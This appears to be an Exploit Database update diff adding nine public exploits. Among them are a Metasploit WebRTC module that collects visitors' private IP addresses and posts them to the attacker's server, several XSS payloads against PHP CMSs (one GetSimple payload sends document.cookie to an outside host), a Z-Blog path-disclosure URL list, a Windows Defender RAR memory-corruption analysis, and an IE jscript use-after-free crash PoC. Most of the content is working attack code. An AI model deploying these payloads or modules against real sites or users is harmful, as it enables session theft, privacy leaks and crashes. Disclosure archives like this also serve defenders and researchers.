DB: 2018-04-06

9 changes to exploits/shellcodes

Microsoft Windows Defender - 'mpengine.dll' Memory Corruption
Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods
MyBB Plugin Downloads 2.0.3 - Cross-Site Scripting
Joomla! Component JS Jobs 1.2.0 - Cross-Site Scripting
WebRTC - Private IP Leakage (Metasploit)
YzmCMS 3.6 - Cross-Site Scripting
Z-Blog 1.5.1.1740 - Cross-Site Scripting
Z-Blog 1.5.1.1740 - Full Path Disclosure
GetSimple CMS 3.3.13 - Cross-Site Scripting

exploits/multiple/webapps/44403.rb

@@ -0,0 +1,141 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
+        'Description'    => %q(
+          This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Brendan Coles', #MSF Module
+          'Dhiraj Mishra'  #MSF Module
+        ],
+        'References'     => [
+		[ 'CVE', '2018-6849' ],
+		['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
+        ],
+        'DisclosureDate' => 'Jan 26 2018',
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+     # code from: https://github.com/diafygi/webrtc-ips
+     @html = <<-JS
+<script>
+//get the IP addresses associated with an account
+function getIPs(callback){
+    var ip_dups = {};
+
+    //compatibility for firefox and chrome
+    var RTCPeerConnection = window.RTCPeerConnection
+        || window.mozRTCPeerConnection
+        || window.webkitRTCPeerConnection;
+    var useWebKit = !!window.webkitRTCPeerConnection;
+
+    //bypass naive webrtc blocking using an iframe
+    if(!RTCPeerConnection){
+        //NOTE: you need to have an iframe in the page right above the script tag
+        //
+        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
+        //<script>...getIPs called in here...
+        //
+        var win = iframe.contentWindow;
+        RTCPeerConnection = win.RTCPeerConnection
+            || win.mozRTCPeerConnection
+            || win.webkitRTCPeerConnection;
+        useWebKit = !!win.webkitRTCPeerConnection;
+    }
+
+    //minimal requirements for data connection
+    var mediaConstraints = {
+        optional: [{RtpDataChannels: true}]
+    };
+
+    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
+
+    //construct a new RTCPeerConnection
+    var pc = new RTCPeerConnection(servers, mediaConstraints);
+
+    function handleCandidate(candidate){
+        //match just the IP address
+        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
+        var ip_addr = ip_regex.exec(candidate)[1];
+
+        //remove duplicates
+        if(ip_dups[ip_addr] === undefined)
+            callback(ip_addr);
+
+        ip_dups[ip_addr] = true;
+    }
+
+    //listen for candidate events
+    pc.onicecandidate = function(ice){
+
+        //skip non-candidate events
+        if(ice.candidate)
+            handleCandidate(ice.candidate.candidate);
+    };
+
+    //create a bogus data channel
+    pc.createDataChannel("");
+
+    //create an offer sdp
+    pc.createOffer(function(result){
+
+        //trigger the stun server request
+        pc.setLocalDescription(result, function(){}, function(){});
+
+    }, function(){});
+
+    //wait for a while to let everything done
+    setTimeout(function(){
+        //read candidate info from local description
+        var lines = pc.localDescription.sdp.split('\\n');
+
+        lines.forEach(function(line){
+            if(line.indexOf('a=candidate:') === 0)
+                handleCandidate(line);
+        });
+    }, 1000);
+}
+
+getIPs(function(ip){
+  //console.log(ip);
+  var xmlhttp = new XMLHttpRequest;
+  xmlhttp.open('POST', window.location, true);
+  xmlhttp.send(ip);
+});
+</script>
+     JS
+  end
+
+  def on_request_uri(cli, request)
+    case request.method.downcase
+    when 'get'
+      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
+      send_response(cli, @html)
+    when 'post'
+      print_status("#{cli.peerhost}: Received reply:")
+      puts request.to_s
+    else
+      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
+    end
+  end
+end

exploits/php/webapps/44400.txt

@@ -0,0 +1,26 @@
+# Exploit Title: MyBB Downloads Plugin v2.0.3 - Persistent XSS
+# Date: 3/28/18
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=854
+# Version: 2.0.3
+# Tested on: Ubuntu 17.10
+
+
+1. Description:
+It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.
+
+
+2. Proof of Concept:
+
+Persistent XSS
+- Go to downloads.php page
+- Create a New Download
+- Add the following to the title <BODY ONLOAD=alert('XSS')>
+- Now when the admin goes to validate your download he will be alerted
+
+
+3. Solution:
+Update to the latest release
+
+Patch: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads/pull/1/commits

exploits/php/webapps/44401.txt

@@ -0,0 +1,44 @@
+#######################################
+# Exploit Title: Joomla! Component JS Jobs 1.2.0 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 03-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: https://www.joomsky.com/products/js-jobs.html
+# Software Link: https://www.joomsky.com/5/download/1.html
+# Affected Version: 1.2.0
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : CVE-2018-9183
+#
+# 1. Vendor Description:
+#
+# JS Jobs offer to employer to register his company and post jobs. Job
+seeker register him self and add his resume.
+# He can search job and apply on it. Employer will get resume in applied
+resume section.
+#
+# 2. Technical Description:
+#
+# JS Jobs 1.2.0 is missing validation on URL inserted by attacker/employer
+while creating company entry.
+#
+# 3. Proof Of Concept:
+#
+#  Create a company entry by logging in as Employer and paste below payload
+in place of URL field.
+#
+#  Payload : javascript:alert(1) or
+data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
+#
+# 4. Solution:
+#
+# Upgrade to latest release.
+# http://www.joomsky.com/5/download/1.html
+#
+# 5. Reference:
+# https://vel.joomla.org/resolved/2146-js-jobs-1-2-0-xss-cross-site-scripting
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9183
+#####################################

exploits/php/webapps/44405.txt

@@ -0,0 +1,19 @@
+# Exploit Title: YzmCMS 3.6 XSS Vulnerability
+# Date: 2018-04-03
+# Exploit Author: zzw (zzw@5ecurity.cn)
+# Vendor Homepage: http://www.yzmcms.com/
+# Software Link: http://www.yzmcms.com/
+# Version: 3.6
+# CVE : CVE-2018-7653
+
+This is a XSS vulnerability than can attack the users.
+
+poc:
+
+http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 
+
+http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 
+
+http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 
+
+http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes

exploits/php/webapps/44406.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Z-Blog 1.5.1.1740 XSS Vulnerability
+# Date: 2018-04-03
+# Exploit Author: zzw (zzw@5ecurity.cn)
+# Vendor Homepage: https://www.zblogcn.com/
+# Software Link: https://github.com/zblogcn/zblogphp
+# Version: 1.5.1.1740
+# CVE : CVE-2018-7736
+
+This is a XSS vulnerability than can attack the users.
+
+poc:
+
+poc of ZC_BLOG_SUBNAME parameter:
+
+http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f
+
+post_data:
+
+ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=
+
+
+poc of ZC_UPLOAD_FILETYPE parameter:
+
+post_data:
+
+ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek"><script>alert(1)</script>ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

exploits/php/webapps/44407.txt

@@ -0,0 +1,74 @@
+# Exploit Title: Z-Blog 1.5.1.1740 Web Site physical path leakage Vulnerability
+# Date: 2018-04-03
+# Exploit Author: zzw (zzw@5ecurity.cn)
+# Vendor Homepage: https://www.zblogcn.com/
+# Software Link: https://github.com/zblogcn/zblogphp
+# Version: 1.5.1.1740
+# CVE : CVE-2018-7737
+
+This is a WebSite physical path leakage vulnerability .
+
+poc (visit the following pages):
+
+http://localhost/z-blog//zb_system/admin/admin_footer.php
+http://localhost/z-blog//zb_system/admin/admin_header.php
+http://localhost/z-blog//zb_system/admin/admin_left.php
+http://localhost/z-blog//zb_system/admin/admin_top.php
+http://localhost/z-blog//zb_system/function/c_system_admin.php
+http://localhost/z-blog//zb_system/function/c_system_misc.php
+http://localhost/z-blog//zb_system/function/lib/category.php
+http://localhost/z-blog//zb_system/function/lib/comment.php
+http://localhost/z-blog//zb_system/function/lib/dbmysql.php
+http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
+http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
+http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
+http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
+http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
+http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
+http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
+http://localhost/z-blog//zb_system/function/lib/member.php
+http://localhost/z-blog//zb_system/function/lib/module.php
+http://localhost/z-blog//zb_system/function/lib/networkcurl.php
+http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
+http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
+http://localhost/z-blog//zb_system/function/lib/post.php
+http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
+http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
+http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
+http://localhost/z-blog//zb_system/function/lib/tag.php
+http://localhost/z-blog//zb_system/function/lib/upload.php
+http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
+http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
+http://localhost/z-blog//zb_users/cache/compiled/default/index.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
+http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
+http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
+http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
+http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
+http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
+http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
+http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
+http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
+http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
+http://localhost/z-blog//zb_users/cache/compiled/default/single.php
+http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
+http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
+http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
+http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
+http://localhost/z-blog//zb_users/plugin/STACentre/include.php
+http://localhost/z-blog//zb_users/plugin/Totoro/include.php
+http://localhost/z-blog//zb_users/plugin/UEditor/include.php
+http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
+http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
+http://localhost/z-blog//zb_users/theme/default/include.php
+http://localhost/z-blog//zb_users/theme/metro/include.php
+http://localhost/z-blog//zb_users/theme/WhitePage/include.php
+
+the website will request like :   
+
+Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8

exploits/php/webapps/44408.txt

@@ -0,0 +1,54 @@
+#######################################
+# Exploit Title: GetSimple CMS 3.3.13 - Cross Site Scripting Vulnerability
+# Google Dork: N/A
+# Date: 03-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://get-simple.info/
+# Software Link: http://get-simple.info/download/
+# Affected Version: 3.3.13
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : CVE-2018-9173
+#
+# 1. Vendor Description:
+#
+# GetSimple is an XML based, stand-alone, fully independent and lite
+Content Management System. To go along with its
+# best-in-class user interface, we have loaded it with features that every
+website needs, but with nothing it
+# doesn't. GetSimple is truly the simplest way to manage a small-business
+website.
+#
+# 2. Technical Description:
+#
+# Cross-site scripting (XSS) vulnerability in
+admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13
+# allows remote attackers to inject arbitrary web script or HTML, as
+demonstrated by the movieName parameter.
+#
+# 3. Proof Of Concept:
+#
+#  Simple alert.
+#
+#  http://
+[URL]GetSimpleCMS-3.3.13/admin/template/js/uploadify/uploadify.swf?movieName="])}catch(
+#  e){alert("MrR3boot")}//
+#
+#  Grab the cookies
+#
+#  http://
+[URL]GetSimpleCMS-3.3.13/admin/template/js/uploadify/uploadify.swf?movieName="])}catch(
+#  e){window.location="https://mrreboot.here?"+document.cookie}//
+#
+# 4. Solution:
+#
+# Upgrade to latest release.
+# http://get-simple.info/download/
+#
+# 5. Reference:
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9173
+# https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1266
+#####################################

exploits/windows/dos/44402.txt

@@ -0,0 +1,52 @@
+Windows Defender inspects a variety of different archive formats, among others RAR.
+
+Inspection of mpengine.dll revealed that the code responsible for processing RAR archives appears to be a forked and modified version of the original unrar code; given that it still processes the VMSF_UPCASE filter (which was removed in unrar 5.0), it seems that the code is derived from a version of unrar older or equal than 4.2.4.
+
+Interestingly, the issue discovered in CVE-2012-6706 (Sophos VMSF_DELTA, and in 2017 unrar) and other signedness issues in the RarVM::ExecuteStandardFilter function were fixed long ago (apparently without a report to upstream, most likely by simply turning the relevant variables from "signed" to "unsigned").
+
+It appears that this blanket conversion from signed to unsigned ended up introducing a new vulnerability, though:
+
+From unrar 4.2.4 rarvm.cpp:
+
+    case VMSF_RGB:
+      {
+        int DataSize=R[4],Width=R[0]-3,PosR=R[1];
+        byte *SrcData=Mem,*DestData=SrcData+DataSize;
+        const int Channels=3;
+        SET_VALUE(false,&Mem[VM_GLOBALMEMADDR+0x20],DataSize);
+        if ((uint)DataSize>=VM_GLOBALMEMADDR/2 || PosR<0)
+          break;
+        for (int CurChannel=0;CurChannel<Channels;CurChannel++)
+
+The code clearly ensures that PosR is positive from here on.
+
+This check is no longer present in the binary version of the same code in mpengine, most likely since most signed comparisons in this function have been turned unsigned. 
+
+This causes a vulnerability later in the same function (RarVM::ExecuteStandardFilter)
+
+Decompile of the mpengine code snippet:
+
+if ( PosR + 2 < DataSize ) {
+  v50 = (_BYTE *)(v39 + PosR);
+  do {
+    v51 = v50[1];
+    *v50 += v51;
+    v50 += 3;
+    *(v50 - 1) += v51;
+  } while ( (unsigned int)&v50[2 - v39] < DataSize );
+
+Original unrar code:
+  for (int I=PosR,Border=DataSize-2;I<Border;I+=3)
+  {
+    byte G=DestData[I+1];
+    DestData[I]+=G;
+    DestData[I+2]+=G;
+  }
+
+An attacker that can set PosR to be -2, and DataSize to 1, will bypass the (PosR + 2 < DataSize) check. v50 above will then point to one byte *before* the allocated buffer (v50 respective DestData points into a buffer at index DataSize -- so adding -2 to index 1 will index to -1. The byte from the start of this array will be added into the byte preceding the array.
+
+A minimal sample RAR file that exhibits these traits & causes mpengine to corrupt memory and crash is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44402.zip

exploits/windows/dos/44404.html

@@ -0,0 +1,124 @@
+<!--
+There are multiple use-after-free issues in Array methods in jscript. When jscript executes an Array method (such as Array.join), it first retrieves the length of an array. If the input is not an array but an object, then the length property of the object is going to be retrieved and converted to scalar. During this conversion, the "length" property is not going to be tracked by the garbage collector and the conversion to scalar causes toString()/valueOf() callbacks to be triggered. Thus, during these callbacks, the "length" property could be freed and then the freed memory can be referenced by accessing the "this" variable inside the toString()/valueOf() function.
+
+All of the Array methods exhibit this pattern (see the PoC).
+
+Due to the specifics of how jscript implements variable, this will only result in the crash if the entire memory block that holds the "this" variable gets freed. This is why the PoC uses an object with a large number of elements in addition to the "length" element.
+
+As with the other use-after-free issues I reported recently that result in garbage-collecting the "this" variable, I believe the correct way to fix this is to always put the "this" VAR on the garbage collector root list before any function gets called, instead of attempting to fix each affected function individually.
+
+PoC for IE (note: The PoC has been tested on Windows 7 64-bit in IE 11.0.50 with 64-bit tab process and with Page Heap enabled):
+
+============================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+var vars = {};
+
+function f() {
+  alert('in f');
+  for(var i=0; i<40000; i++) {
+    vars[i] = 1;
+  }
+  vars.length = 0;
+  CollectGarbage();
+  alert(this);
+}
+
+for(var i=0; i<20000; i++) {
+  vars[i] = [];
+}
+vars.length = [];
+for(var i=20000; i<40000; i++) {
+  vars[i] = [];
+}
+
+vars.length.toString = f;
+
+// all of these work, just uncomment the one you want to test
+//Array.prototype.join.call(vars);
+//Array.prototype.reverse.call(vars);
+//Array.prototype.sort.call(vars);
+//Array.prototype.pop.call(vars);
+//Array.prototype.push.call(vars, 1);
+//Array.prototype.shift.call(vars);
+//Array.prototype.unshift.call(vars, 1);
+//Array.prototype.slice.call(vars, 1);
+Array.prototype.splice.call(vars, 1, 1);
+
+alert('failed');
+
+</script>
+
+<!--
+============================================
+
+Debug log:
+
+============================================
+
+(e7c.54c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!ConvertToObject+0x2f:
+000007fe`f7eb06cf 0fb70a          movzx   ecx,word ptr [rdx] ds:00000000`2115eee0=????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`10ed8a10 000007fe`f7eb0684 jscript!ConvertToObject+0x2f
+01 00000000`10ed8a90 000007fe`f7eb0fa9 jscript!CScriptRuntime::InitThis+0x81
+02 00000000`10ed8ac0 000007fe`f7e88ec2 jscript!CScriptRuntime::Run+0x3b0d
+03 00000000`10ed98c0 000007fe`f7e88d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+04 00000000`10ed9ad0 000007fe`f7eb1e34 jscript!ScrFncObj::Call+0xb7
+05 00000000`10ed9b70 000007fe`f7e886ea jscript!NameTbl::InvokeInternal+0x60f
+06 00000000`10ed9c90 000007fe`f7efa368 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+07 00000000`10ed9ce0 000007fe`f7ebcd77 jscript!NameTbl::GetValDef+0xf8
+08 00000000`10ed9d70 000007fe`f7e8de69 jscript!NameTbl::InvokeInternal+0xb07
+09 00000000`10ed9e90 000007fe`f7ea4b44 jscript!VAR::GetValue+0xa1
+0a 00000000`10ed9ee0 000007fe`f7eecd5e jscript!ConvertToScalar+0x60
+0b 00000000`10ed9f50 000007fe`f7e8c2dc jscript!JsArraySplice+0x11e
+0c 00000000`10eda050 000007fe`f7e8a9fe jscript!NatFncObj::Call+0x138
+0d 00000000`10eda100 000007fe`f7e886ea jscript!NameTbl::InvokeInternal+0x3f8
+0e 00000000`10eda220 000007fe`f7eddb82 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+0f 00000000`10eda270 000007fe`f7e8c2dc jscript!JsFncCall+0xc2
+10 00000000`10eda300 000007fe`f7e8a9fe jscript!NatFncObj::Call+0x138
+11 00000000`10eda3b0 000007fe`f7e8b234 jscript!NameTbl::InvokeInternal+0x3f8
+12 00000000`10eda4d0 000007fe`f7e89852 jscript!VAR::InvokeByName+0x81c
+13 00000000`10eda6e0 000007fe`f7e89929 jscript!VAR::InvokeDispName+0x72
+14 00000000`10eda760 000007fe`f7e824b8 jscript!VAR::InvokeByDispID+0x1229
+15 00000000`10eda7b0 000007fe`f7e88ec2 jscript!CScriptRuntime::Run+0x5a6
+16 00000000`10edb5b0 000007fe`f7e88d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+17 00000000`10edb7c0 000007fe`f7e88b95 jscript!ScrFncObj::Call+0xb7
+18 00000000`10edb860 000007fe`f7e8e6c0 jscript!CSession::Execute+0x19e
+19 00000000`10edb930 000007fe`f7e970e7 jscript!COleScript::ExecutePendingScripts+0x17a
+1a 00000000`10edba00 000007fe`f7e968d6 jscript!COleScript::ParseScriptTextCore+0x267
+1b 00000000`10edbaf0 000007fe`ebf86151 jscript!COleScript::ParseScriptText+0x56
+1c 00000000`10edbb50 000007fe`ec6db3a4 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+1d 00000000`10edbbd0 000007fe`ebf8715e MSHTML!CScriptCollection::ParseScriptText+0x37f
+1e 00000000`10edbcb0 000007fe`ebf86b71 MSHTML!CScriptData::CommitCode+0x3d9
+1f 00000000`10edbe80 000007fe`ebf86901 MSHTML!CScriptData::Execute+0x283
+20 00000000`10edbf40 000007fe`ec733559 MSHTML!CHtmScriptParseCtx::Execute+0x101
+21 00000000`10edbf80 000007fe`ec0673da MSHTML!CHtmParseBase::Execute+0x235
+22 00000000`10edc020 000007fe`ec01b689 MSHTML!CHtmPost::Broadcast+0x90
+23 00000000`10edc060 000007fe`ebf5742f MSHTML!CHtmPost::Exec+0x4bb
+24 00000000`10edc270 000007fe`ebf57380 MSHTML!CHtmPost::Run+0x3f
+25 00000000`10edc2a0 000007fe`ebf58d0c MSHTML!PostManExecute+0x70
+26 00000000`10edc320 000007fe`ebf5b293 MSHTML!PostManResume+0xa1
+27 00000000`10edc360 000007fe`ebf75dcc MSHTML!CHtmPost::OnDwnChanCallback+0x43
+28 00000000`10edc3b0 000007fe`ec77db35 MSHTML!CDwnChan::OnMethodCall+0x41
+29 00000000`10edc3e0 000007fe`ebe79d85 MSHTML!GlobalWndOnMethodCall+0x240
+2a 00000000`10edc480 00000000`774f9bbd MSHTML!GlobalWndProc+0x150
+2b 00000000`10edc500 00000000`774f98c2 USER32!UserCallWinProcCheckWow+0x1ad
+2c 00000000`10edc5c0 000007fe`f274305c USER32!DispatchMessageWorker+0x3b5
+2d 00000000`10edc640 000007fe`f26ffa9b IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+2e 00000000`10edf8c0 000007fe`fe28a2bf IEFRAME!LCIETab_ThreadProc+0x3a3
+2f 00000000`10edf9f0 000007fe`fad7925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+30 00000000`10edfa20 00000000`775f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+31 00000000`10edfa70 00000000`7772a561 kernel32!BaseThreadInitThunk+0xd
+32 00000000`10edfaa0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+============================================
+-->

files_exploits.csv

@@ -5921,6 +5921,8 @@ id,file,description,date,author,type,platform,port
 44395,exploits/multiple/dos/44395.js,"Google Chrome V8 - 'Genesis::InitializeGlobal' Out-of-Bounds Read/Write",2018-04-03,"Google Security Research",dos,multiple,
 44396,exploits/windows/dos/44396.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (1)",2018-04-03,"Google Security Research",dos,windows,
 44397,exploits/windows/dos/44397.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)",2018-04-03,"Google Security Research",dos,windows,
+44402,exploits/windows/dos/44402.txt,"Microsoft Windows Defender - 'mpengine.dll' Memory Corruption",2018-04-05,"Google Security Research",dos,windows,
+44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39098,3 +39100,10 @@ id,file,description,date,author,type,platform,port
 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
 44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,
 44399,exploits/php/webapps/44399.rb,"ProcessMaker - Plugin Upload (Metasploit)",2018-04-04,Metasploit,webapps,php,
+44400,exploits/php/webapps/44400.txt,"MyBB Plugin Downloads 2.0.3 - Cross-Site Scripting",2018-04-05,0xB9,webapps,php,
+44401,exploits/php/webapps/44401.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
+44403,exploits/multiple/webapps/44403.rb,"WebRTC - Private IP Leakage (Metasploit)",2018-04-05,"Dhiraj Mishra",webapps,multiple,
+44405,exploits/php/webapps/44405.txt,"YzmCMS 3.6 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
+44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
+44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php,
+44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,